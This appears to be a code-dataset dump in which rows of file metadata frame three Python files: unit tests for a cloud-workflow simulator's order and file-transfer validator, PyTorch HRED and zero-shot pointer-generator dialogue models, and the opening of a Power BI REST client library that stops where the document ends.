| 0
| 0
| 0
| 1
| 0.122984
| false
| 0
| 0.006048
| 0
| 0.252016
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eeff1f2641f9291e1c4a5055ecf8ab4773f633e7
| 9,258
|
py
|
Python
|
scripts/validation/order_validator_test.py
|
malawski/cloudworkflowsimulator
|
12b2f30c7f72c3e52a5c53d86fd39b319adf71c8
|
[
"Apache-2.0"
] | 22
|
2015-05-28T10:08:46.000Z
|
2021-11-01T12:47:16.000Z
|
scripts/validation/order_validator_test.py
|
AYUSHMIT/cloudworkflowsimulator
|
12b2f30c7f72c3e52a5c53d86fd39b319adf71c8
|
[
"Apache-2.0"
] | 46
|
2015-01-14T18:23:11.000Z
|
2017-07-18T02:26:48.000Z
|
scripts/validation/order_validator_test.py
|
AYUSHMIT/cloudworkflowsimulator
|
12b2f30c7f72c3e52a5c53d86fd39b319adf71c8
|
[
"Apache-2.0"
] | 18
|
2015-02-11T17:48:20.000Z
|
2021-11-01T12:47:17.000Z
|
import unittest
from log_parser.execution_log import TransferLog
from validation import workflow, order_validator
from validation.parsed_log_loader import TaskLog
class OrderValidatorTest(unittest.TestCase):
# /-> child1
# parent |
# \-> child2
def _prepare_parent_child_dag(self):
parent_task = workflow.Task('parent', 10.0)
child1_task = workflow.Task('child1', 2.0)
child2_task = workflow.Task('child2', 3.0)
dag_builder = workflow.DagBuilder()
dag_builder.add_task(parent_task)
dag_builder.add_task(child1_task)
dag_builder.add_task(child2_task)
dag_builder.add_edge('parent', 'child1')
dag_builder.add_edge('parent', 'child2')
return dag_builder.build()
# before --> (transferred.txt) --> after
def _prepare_file_transfer_dag(self):
before_task = workflow.Task('before', 10.0)
after_task = workflow.Task('after', 10.0)
transferred_file = workflow.File('transferred.txt', 1000)
dag_builder = workflow.DagBuilder()
dag_builder.add_task(before_task)
dag_builder.add_task(after_task)
dag_builder.add_file(transferred_file)
dag_builder.add_edge('before', 'after')
dag_builder.add_output_file('before', 'transferred.txt')
dag_builder.add_input_file('after', 'transferred.txt')
return dag_builder.build()
def test_should_pass_when_order_is_correct(self):
dag = self._prepare_parent_child_dag()
dag.id = '1'
tasks = [
TaskLog(id='parent_1', workflow='1', task_id='parent', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='child1_1', workflow='1', task_id='child1', started=11.0, finished=13.0,
vm=1, result='OK'),
TaskLog(id='child2_1', workflow='1', task_id='child2', started=12.0, finished=15.0,
vm=2, result='OK')]
result = order_validator.validate(dag, tasks)
self.assertTrue(result.is_valid)
self.assertListEqual([], result.errors)
def test_should_fail_if_any_following_task_was_finished_before(self):
dag = self._prepare_parent_child_dag()
dag.id = '1'
tasks = [
TaskLog(id='parent_1', workflow='1', task_id='parent', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='child1_1', workflow='1', task_id='child1', started=11.0, finished=13.0,
vm=1, result='OK'),
TaskLog(id='child2_1', workflow='1', task_id='child2', started=5.0, finished=8.0,
vm=2, result='OK')]
result = order_validator.validate(dag, tasks)
self.assertFalse(result.is_valid)
self.assertIn('child2', result.errors[0])
def test_should_pass_if_task_was_started_immediately(self):
dag = self._prepare_parent_child_dag()
dag.id = '1'
tasks = [
TaskLog(id='parent_1', workflow='1', task_id='parent', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='child1_1', workflow='1', task_id='child1', started=10.0, finished=13.0,
vm=1, result='OK'),
TaskLog(id='child2_1', workflow='1', task_id='child2', started=10.0, finished=15.0,
vm=2, result='OK')]
result = order_validator.validate(dag, tasks)
self.assertTrue(result.is_valid)
def test_should_pass_if_transfers_are_ok(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
direction='UPLOAD', file_id='transferred.txt'),
TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
direction='DOWNLOAD', file_id='transferred.txt')]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertTrue(result.is_valid)
self.assertListEqual([], result.errors)
def test_should_fail_if_file_was_not_downloaded_at_all(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
direction='UPLOAD', file_id='transferred.txt'),
]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertFalse(result.is_valid)
def test_should_fail_if_file_was_not_uploaded_at_all(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(
id='234', job_id='after_1', vm=1, started=12.0,
finished=13.0, direction='DOWNLOAD', file_id='transferred.txt')]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertFalse(result.is_valid)
def test_should_fail_if_downloaded_to_bad_vm(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(id='123', job_id='before_1', vm=2, started=10.0, finished=12.0,
direction='UPLOAD', file_id='transferred.txt'),
TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
direction='DOWNLOAD', file_id='transferred.txt')]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertFalse(result.is_valid)
def test_should_fail_if_uploaded_from_bad_vm(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
direction='UPLOAD', file_id='transferred.txt'),
TransferLog(id='234', job_id='after_1', vm=2, started=12.0, finished=13.0,
direction='DOWNLOAD', file_id='transferred.txt')]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertFalse(result.is_valid)
def test_should_fail_if_upload_instead_of_download(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
direction='UPLOAD', file_id='transferred.txt'),
TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
direction='UPLOAD', file_id='transferred.txt')]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertFalse(result.is_valid)
def test_should_fail_if_download_instead_of_upload(self):
dag = self._prepare_file_transfer_dag()
dag.id = '1'
tasks = [
TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
vm=1, result='OK'),
TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
vm=1, result='OK')]
transfers = [
TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
direction='DOWNLOAD', file_id='transferred.txt'),
TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
direction='DOWNLOAD', file_id='transferred.txt')]
result = order_validator.validate_transfers(dag, tasks, transfers)
self.assertFalse(result.is_valid)
if __name__ == '__main__':
unittest.main()
| 40.427948
| 95
| 0.603586
| 1,216
| 9,258
| 4.361842
| 0.080592
| 0.059389
| 0.043364
| 0.060709
| 0.815799
| 0.786011
| 0.78356
| 0.782051
| 0.761312
| 0.761312
| 0
| 0.054483
| 0.250594
| 9,258
| 228
| 96
| 40.605263
| 0.710003
| 0.008317
| 0
| 0.715116
| 0
| 0
| 0.099378
| 0
| 0
| 0
| 0
| 0
| 0.075581
| 1
| 0.069767
| false
| 0.017442
| 0.023256
| 0
| 0.110465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
011698680b2c96d935d6bfd11067c645d3067ded
| 22,749
|
py
|
Python
|
zsdg/models/models.py
|
josephch405/NeuralDialog-ZSDG
|
0daa96e8f4d6786c1c8b96c27b1f6200605909a1
|
[
"Apache-2.0"
] | null | null | null |
zsdg/models/models.py
|
josephch405/NeuralDialog-ZSDG
|
0daa96e8f4d6786c1c8b96c27b1f6200605909a1
|
[
"Apache-2.0"
] | null | null | null |
zsdg/models/models.py
|
josephch405/NeuralDialog-ZSDG
|
0daa96e8f4d6786c1c8b96c27b1f6200605909a1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# author: Tiancheng Zhao
import torch
import torch.nn as nn
import torch.nn.functional as F
from zsdg.dataset.corpora import PAD, BOS, EOS, BOD
from zsdg import criterions
from zsdg.enc2dec.decoders import DecoderRNN, DecoderPointerGen
from zsdg.enc2dec.encoders import EncoderRNN, RnnUttEncoder
from zsdg.utils import INT, FLOAT, LONG, cast_type
from zsdg.nn_lib import IdentityConnector, Bi2UniConnector
from zsdg import nn_lib
import numpy as np
from zsdg.enc2dec.decoders import GEN
from zsdg.utils import Pack
from zsdg.models.model_bases import BaseModel
class PtrBase(BaseModel):
def compute_loss(self, dec_outs, dec_ctx, labels):
rnn_loss = self.nll_loss(dec_outs, labels)
# find attention loss
g = dec_ctx.get(DecoderPointerGen.KEY_G)
if g is not None:
ptr_softmax = dec_ctx[DecoderPointerGen.KEY_PTR_SOFTMAX]
flat_ptr = ptr_softmax.view(-1, self.vocab_size)
label_mask = labels.view(-1, 1) == self.rev_vocab[PAD]
label_ptr = flat_ptr.gather(1, labels.view(-1, 1))
not_in_ctx = label_ptr == 0
mix_ptr = torch.cat([label_ptr, g.view(-1, 1)],
dim=1).gather(1, not_in_ctx.long())
# mix_ptr = g.view(-1, 1) + label_ptr
attention_loss = -1.0 * torch.log(mix_ptr.clamp(min=1e-10))
attention_loss.masked_fill_(label_mask, 0)
valid_cnt = (label_mask.size(0) -
torch.sum(label_mask).float()).clamp(min=1e-10)
avg_attn_loss = torch.sum(attention_loss) / valid_cnt
else:
avg_attn_loss = None
return Pack(nll=rnn_loss, attn_loss=avg_attn_loss)
class HRED(BaseModel):
def valid_loss(self, loss, batch_cnt=None):
return loss.nll
def __init__(self, corpus, config):
super(HRED, self).__init__(config)
self.vocab = corpus.vocab
self.rev_vocab = corpus.rev_vocab
self.vocab_size = len(self.vocab)
self.go_id = self.rev_vocab[BOS]
self.eos_id = self.rev_vocab[EOS]
self.pad_id = self.rev_vocab[PAD]
# build model here
self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
use_attn=config.utt_type == 'attn_rnn',
vocab_size=self.vocab_size,
embed_dim=config.embed_size, feat_size=1)
self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
config.ctx_cell_size,
0.0,
config.dropout,
config.num_layer,
config.rnn_cell,
variable_lengths=False,
bidirection=config.bi_ctx_cell)
if config.bi_ctx_cell or config.num_layer > 1:
self.connector = Bi2UniConnector(config.rnn_cell, config.num_layer,
config.ctx_cell_size,
config.dec_cell_size)
else:
self.connector = IdentityConnector()
self.decoder = DecoderRNN(self.vocab_size, config.max_dec_len,
config.embed_size, config.dec_cell_size,
self.go_id, self.eos_id,
n_layers=1, rnn_cell=config.rnn_cell,
input_dropout_p=config.dropout,
dropout_p=config.dropout,
use_attention=config.use_attn,
attn_size=self.ctx_encoder.output_size,
attn_mode=config.attn_type,
use_gpu=config.use_gpu)
self.nll = criterions.NLLEntropy(self.pad_id, config)
def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
"""
B: batch_size, D: context_size U: utt_size, X: response_size
1. ctx_lens: B x 1
2. ctx_utts: B x D x U
3. ctx_confs: B x D
4. ctx_floors: B x D
5. out_lens: B x 1
6. out_utts: B x X
:param data_feed:
{'ctx_lens': vec_ctx_lens, 'ctx_utts': vec_ctx_utts,
'ctx_confs': vec_ctx_confs, 'ctx_floors': vec_ctx_floors,
'out_lens': vec_out_lens, 'out_utts': vec_out_utts}
:param return_label
:param dec_type
:return: outputs
"""
ctx_lens = data_feed['context_lens']
ctx_utts = self.np2var(data_feed['contexts'], LONG)
ctx_confs = self.np2var(data_feed['context_confs'], FLOAT)
out_utts = self.np2var(data_feed['outputs'], LONG)
batch_size = len(ctx_lens)
enc_inputs = self.utt_encoder(ctx_utts, ctx_confs)
enc_outs, enc_last = self.ctx_encoder(enc_inputs, ctx_lens)
# get decoder inputs
labels = out_utts[:, 1:].contiguous()
dec_inputs = out_utts[:, 0:-1]
# pack attention context
if self.config.use_attn:
attn_inputs = enc_outs
else:
attn_inputs = None
# create decoder initial states
dec_init_state = self.connector(enc_last)
# decode
dec_outs, dec_last, dec_ctx = self.decoder(batch_size,
dec_inputs, dec_init_state,
attn_context=attn_inputs,
mode=mode, gen_type=gen_type,
beam_size=self.config.beam_size)
if mode == GEN:
return dec_ctx, labels
else:
if return_latent:
return Pack(nll=self.nll(dec_outs, labels), latent_actions=dec_init_state)
else:
return Pack(nll=self.nll(dec_outs, labels))
class PtrHRED(PtrBase):
def valid_loss(self, loss, batch_cnt=None):
total_loss = loss.nll + 0.01 * loss.attn_loss
return total_loss
def __init__(self, corpus, config):
super(PtrHRED, self).__init__(config)
self.vocab = corpus.vocab
self.rev_vocab = corpus.rev_vocab
self.vocab_size = len(self.vocab)
self.go_id = self.rev_vocab[BOS]
self.eos_id = self.rev_vocab[EOS]
self.pad_id = self.rev_vocab[PAD]
# build model here
self.embedding = nn.Embedding(self.vocab_size, config.embed_size)
self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
use_attn=True,
vocab_size=self.vocab_size,
embedding=self.embedding, feat_size=1)
self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
config.ctx_cell_size,
0.0,
config.dropout,
config.num_layer,
config.rnn_cell,
variable_lengths=False,
bidirection=config.bi_ctx_cell)
if config.bi_ctx_cell or config.num_layer > 1:
self.connector = Bi2UniConnector(config.rnn_cell, config.num_layer,
config.ctx_cell_size,
config.dec_cell_size)
else:
self.connector = IdentityConnector()
self.attn_size = self.ctx_encoder.output_size
self.decoder = DecoderPointerGen(self.vocab_size, config.max_dec_len,
config.embed_size, config.dec_cell_size,
self.go_id, self.eos_id,
n_layers=1, rnn_cell=config.rnn_cell,
input_dropout_p=config.dropout,
dropout_p=config.dropout,
attn_size=self.attn_size,
attn_mode=config.attn_type,
use_gpu=config.use_gpu,
embedding=self.embedding)
self.nll_loss = criterions.NLLEntropy(self.pad_id, config)
def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
"""
B: batch_size, D: context_size U: utt_size, X: response_size
1. ctx_lens: B x 1
2. ctx_utts: B x D x U
3. ctx_confs: B x D
4. ctx_floors: B x D
5. out_lens: B x 1
6. out_utts: B x X
:param data_feed:
{'ctx_lens': vec_ctx_lens, 'ctx_utts': vec_ctx_utts,
'ctx_confs': vec_ctx_confs, 'ctx_floors': vec_ctx_floors,
'out_lens': vec_out_lens, 'out_utts': vec_out_utts}
:param return_label
:param dec_type
:return: outputs
"""
ctx_lens = data_feed['context_lens']
ctx_utts = self.np2var(data_feed['contexts'], LONG)
ctx_confs = self.np2var(data_feed['context_confs'], FLOAT)
out_utts = self.np2var(data_feed['outputs'], LONG)
batch_size = len(ctx_lens)
utt_embedded, utt_outs, _, _ = self.utt_encoder(
ctx_utts, ctx_confs, return_all=True)
ctx_outs, ctx_last = self.ctx_encoder(utt_embedded, ctx_lens)
# get decoder inputs
labels = out_utts[:, 1:].contiguous()
dec_inputs = out_utts[:, 0:-1]
# create decoder initial states
dec_init_state = self.connector(ctx_last)
# attention
ctx_outs = ctx_outs.unsqueeze(2).repeat(1, 1, ctx_utts.size(
2), 1).view(batch_size, -1, self.ctx_encoder.output_size)
utt_outs = utt_outs.contiguous().view(
batch_size, -1, self.utt_encoder.output_size)
attn_inputs = ctx_outs + utt_outs
flat_ctx_words = ctx_utts.view(batch_size, -1)
# decode
dec_outs, dec_last, dec_ctx = self.decoder(batch_size, attn_inputs, flat_ctx_words,
inputs=dec_inputs, init_state=dec_init_state,
mode=mode, gen_type=gen_type)
if mode == GEN:
return dec_ctx, labels
else:
results = self.compute_loss(dec_outs, dec_ctx, labels)
if return_latent:
results['latent_actions'] = dec_init_state
return results
class ZeroShotHRED(PtrBase):
def __init__(self, corpus, config):
super(ZeroShotHRED, self).__init__(config)
self.vocab = corpus.vocab
self.rev_vocab = corpus.rev_vocab
self.vocab_size = len(self.vocab)
self.go_id = self.rev_vocab[BOS]
self.eos_id = self.rev_vocab[EOS]
self.pad_id = self.rev_vocab[PAD]
# build model here
self.embedding = nn.Embedding(
self.vocab_size, config.embed_size, padding_idx=self.pad_id)
self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
use_attn=config.utt_type == 'rnn_attn',
vocab_size=self.vocab_size,
embedding=self.embedding, feat_size=1)
self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
config.ctx_cell_size,
0.0,
config.dropout,
config.num_layer,
config.rnn_cell,
variable_lengths=False,
bidirection=config.bi_ctx_cell)
self.policy = nn_lib.Hidden2Feat(self.ctx_encoder.output_size, config.dec_cell_size,
is_lstm=config.rnn_cell == 'lstm')
self.utt_policy = lambda x: x
self.connector = nn_lib.LinearConnector(config.dec_cell_size, config.dec_cell_size,
is_lstm=config.rnn_cell == 'lstm')
self.attn_size = self.ctx_encoder.output_size
self.decoder = DecoderRNN(self.vocab_size, config.max_dec_len,
config.embed_size, config.dec_cell_size,
self.go_id, self.eos_id,
n_layers=1, rnn_cell=config.rnn_cell,
input_dropout_p=config.dropout,
dropout_p=config.dropout,
use_attention=config.use_attn,
attn_size=self.ctx_encoder.output_size,
attn_mode=config.attn_type,
use_gpu=config.use_gpu)
self.nll_loss = criterions.NLLEntropy(self.pad_id, config)
self.l2_loss = criterions.L2Loss()
def valid_loss(self, loss, batch_cnt=None):
total_loss = loss.distance + loss.nll
return total_loss
def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
"""
B: batch_size, D: context_size U: utt_size, X: response_size
1. ctx_lens: B x 1
2. ctx_utts: B x D x U
3. ctx_confs: B x D
4. ctx_floors: B x D
5. out_lens: B x 1
6. out_utts: B x X
:param data_feed:
{'ctx_lens': vec_ctx_lens, 'ctx_utts': vec_ctx_utts,
'ctx_confs': vec_ctx_confs, 'ctx_floors': vec_ctx_floors,
'out_lens': vec_out_lens, 'out_utts': vec_out_utts}
:param return_label
:param dec_type
:return: outputs
"""
# optional fields
ctx_lens = data_feed.get('context_lens')
ctx_utts = self.np2var(data_feed.get('contexts'), LONG)
ctx_confs = self.np2var(data_feed.get('context_confs'), FLOAT)
out_acts = self.np2var(data_feed.get('output_actions'), LONG)
domain_metas = self.np2var(data_feed.get('domain_metas'), LONG)
# required fields
out_utts = self.np2var(data_feed['outputs'], LONG)
batch_size = len(data_feed['outputs'])
out_confs = self.np2var(np.ones((batch_size, 1)), FLOAT)
# forward pass
out_embedded, out_outs, _, _ = self.utt_encoder(
out_utts.unsqueeze(1), out_confs, return_all=True)
out_embedded = self.utt_policy(out_embedded.squeeze(1))
if ctx_lens is None:
act_embedded, act_outs, _, _ = self.utt_encoder(
out_acts.unsqueeze(1), out_confs, return_all=True)
act_embedded = act_embedded.squeeze(1)
# create attention contexts
attn_inputs = act_outs.contiguous().view(
batch_size, -1, self.utt_encoder.output_size)
attn_words = out_acts.view(batch_size, -1)
latent_action = self.utt_policy(act_embedded)
else:
utt_embedded, utt_outs, _, _ = self.utt_encoder(
ctx_utts, ctx_confs, return_all=True)
ctx_outs, ctx_last = self.ctx_encoder(utt_embedded, ctx_lens)
# create decoder initial states
latent_action = self.policy(ctx_last)
# create attention contexts
ctx_outs = ctx_outs.unsqueeze(2).repeat(1, 1, ctx_utts.size(
2), 1).view(batch_size, -1, self.ctx_encoder.output_size)
utt_outs = utt_outs.contiguous().view(
batch_size, -1, self.utt_encoder.output_size)
attn_inputs = ctx_outs + utt_outs # batch_size x num_word x attn_size
# batch_size x num_words
attn_words = ctx_utts.view(batch_size, -1)
dec_init_state = self.connector(latent_action)
# mask out PAD words in the attention inputs
attn_inputs, attn_words = self._remove_padding(attn_inputs, attn_words)
# get decoder inputs
labels = out_utts[:, 1:].contiguous()
dec_inputs = out_utts[:, 0:-1]
# decode
dec_outs, dec_last, dec_ctx = self.decoder(batch_size,
dec_inputs, dec_init_state,
attn_context=attn_inputs,
mode=mode, gen_type=gen_type,
beam_size=self.config.beam_size)
if mode == GEN:
return dec_ctx, labels
else:
rnn_loss = self.nll_loss(dec_outs, labels)
loss_pack = Pack(nll=rnn_loss)
if return_latent:
loss_pack['latent_actions'] = latent_action
loss_pack['distance'] = self.l2_loss(out_embedded, latent_action)
return loss_pack
class ZeroShotPtrHRED(PtrBase):
def __init__(self, corpus, config):
super(ZeroShotPtrHRED, self).__init__(config)
self.vocab = corpus.vocab
self.rev_vocab = corpus.rev_vocab
self.vocab_size = len(self.vocab)
self.go_id = self.rev_vocab[BOS]
self.eos_id = self.rev_vocab[EOS]
self.pad_id = self.rev_vocab[PAD]
# build model here
self.embedding = nn.Embedding(
self.vocab_size, config.embed_size, padding_idx=self.pad_id)
self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
use_attn=config.utt_type == 'rnn_attn',
vocab_size=self.vocab_size,
embedding=self.embedding, feat_size=1)
self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
config.ctx_cell_size,
0.0,
config.dropout,
config.num_layer,
config.rnn_cell,
variable_lengths=False,
bidirection=config.bi_ctx_cell)
self.policy = nn.Linear(
self.ctx_encoder.output_size, config.dec_cell_size)
self.utt_policy = lambda x: x
self.connector = nn_lib.LinearConnector(config.dec_cell_size, config.dec_cell_size,
is_lstm=config.rnn_cell == 'lstm')
self.attn_size = self.ctx_encoder.output_size
self.decoder = DecoderPointerGen(self.vocab_size, config.max_dec_len,
config.embed_size, config.dec_cell_size,
self.go_id, self.eos_id,
n_layers=1, rnn_cell=config.rnn_cell,
input_dropout_p=config.dropout,
dropout_p=config.dropout,
attn_size=self.attn_size,
attn_mode=config.attn_type,
use_gpu=config.use_gpu,
embedding=self.embedding)
self.nll_loss = criterions.NLLEntropy(self.pad_id, config)
self.l2_loss = criterions.L2Loss()
def valid_loss(self, loss, batch_cnt=None):
total_loss = loss.distance + loss.nll + 0.01 * loss.attn_loss
return total_loss
def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
# optional fields
ctx_lens = data_feed.get('context_lens')
ctx_utts = self.np2var(data_feed.get('contexts'), LONG)
ctx_confs = self.np2var(data_feed.get('context_confs'), FLOAT)
out_acts = self.np2var(data_feed.get('output_actions'), LONG)
# required fields
out_utts = self.np2var(data_feed['outputs'], LONG)
batch_size = len(data_feed['outputs'])
out_confs = self.np2var(np.ones((batch_size, 1)), FLOAT)
out_embedded, out_outs, _, _ = self.utt_encoder(
out_utts.unsqueeze(1), out_confs, return_all=True)
out_embedded = self.utt_policy(out_embedded.squeeze(1))
if ctx_lens is None:
act_embedded, act_outs, _, _ = self.utt_encoder(
out_acts.unsqueeze(1), out_confs, return_all=True)
act_embedded = act_embedded.squeeze(1)
# create attention contexts
attn_inputs = act_outs.contiguous().view(
batch_size, -1, self.utt_encoder.output_size)
attn_words = out_acts.view(batch_size, -1)
latent_action = self.utt_policy(act_embedded)
else:
utt_embedded, utt_outs, _, _ = self.utt_encoder(
ctx_utts, ctx_confs, return_all=True)
ctx_outs, ctx_last = self.ctx_encoder(utt_embedded, ctx_lens)
pi_inputs = self._gather_last_out(ctx_outs, ctx_lens)
# create decoder initial states
latent_action = self.policy(pi_inputs)
# create attention contexts
ctx_outs = ctx_outs.unsqueeze(2).repeat(1, 1, ctx_utts.size(
2), 1).view(batch_size, -1, self.ctx_encoder.output_size)
utt_outs = utt_outs.contiguous().view(
batch_size, -1, self.utt_encoder.output_size)
attn_inputs = ctx_outs + utt_outs # batch_size x num_word x attn_size
# batch_size x num_words
attn_words = ctx_utts.view(batch_size, -1)
dec_init_state = self.connector(latent_action)
# mask out PAD words in the attention inputs
attn_inputs, attn_words = self._remove_padding(attn_inputs, attn_words)
# get decoder inputs
labels = out_utts[:, 1:].contiguous()
dec_inputs = out_utts[:, 0:-1]
# decode
dec_outs, dec_last, dec_ctx = self.decoder(batch_size, attn_inputs, attn_words,
inputs=dec_inputs, init_state=dec_init_state,
mode=mode, gen_type=gen_type)
if mode == GEN:
return dec_ctx, labels
else:
loss_pack = self.compute_loss(dec_outs, dec_ctx, labels)
if return_latent:
loss_pack['latent_actions'] = latent_action
loss_pack['distance'] = self.l2_loss(out_embedded, latent_action)
return loss_pack
| 43.166983
| 96
| 0.549651
| 2,690
| 22,749
| 4.32974
| 0.077695
| 0.023182
| 0.025243
| 0.023182
| 0.874818
| 0.858504
| 0.853954
| 0.843307
| 0.82957
| 0.815575
| 0
| 0.010554
| 0.366917
| 22,749
| 526
| 97
| 43.249049
| 0.798153
| 0.090773
| 0
| 0.794366
| 0
| 0
| 0.016389
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03662
| false
| 0
| 0.039437
| 0.002817
| 0.129577
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01349e9d3884f582243e79a7a4365f94ee3791b1
| 51,252
|
py
|
Python
|
simplepbi/datasets/__init__.py
|
ladataweb/SimplePBI
|
b9743bbb75517edda7eeea1388ab109cc8599c7c
|
[
"MIT"
] | null | null | null |
simplepbi/datasets/__init__.py
|
ladataweb/SimplePBI
|
b9743bbb75517edda7eeea1388ab109cc8599c7c
|
[
"MIT"
] | null | null | null |
simplepbi/datasets/__init__.py
|
ladataweb/SimplePBI
|
b9743bbb75517edda7eeea1388ab109cc8599c7c
|
[
"MIT"
] | null | null | null |
'''
/¯¯¯¯¯¯¯¯¯\
/ \
| | __ | *********************************************
| | | \ | Code writen by Ignacio and Martin.
| | | | |
| |__|_ | | La Data Web
| |__/ | *********************************************
\ /
\__________/
'''
import json
import requests
from simplepbi import utils
import pandas as pd
class Datasets():
"""Simple library to use the Power BI api and obtain datasets from it.
"""
def __init__(self, token):
"""Create a simplePBI object to request admin API
Args:
token: String
Bearer Token to use the Power Bi Rest API
"""
self.token = token
def get_dataset(self, dataset_id):
"""Returns the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a dataset in My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_dataset_in_group(self, workspace_id, dataset_id):
"""Returns the specified dataset from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a dataset in the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasets(self):
"""Returns a list of datasets from My workspace.
### Parameters
----
None
### Returns
----
Dict:
A dictionary containing all the datasets in My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets"
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasets_in_group(self, workspace_id):
"""Returns a list of datasets from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the datasets in the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets".format(workspace_id)
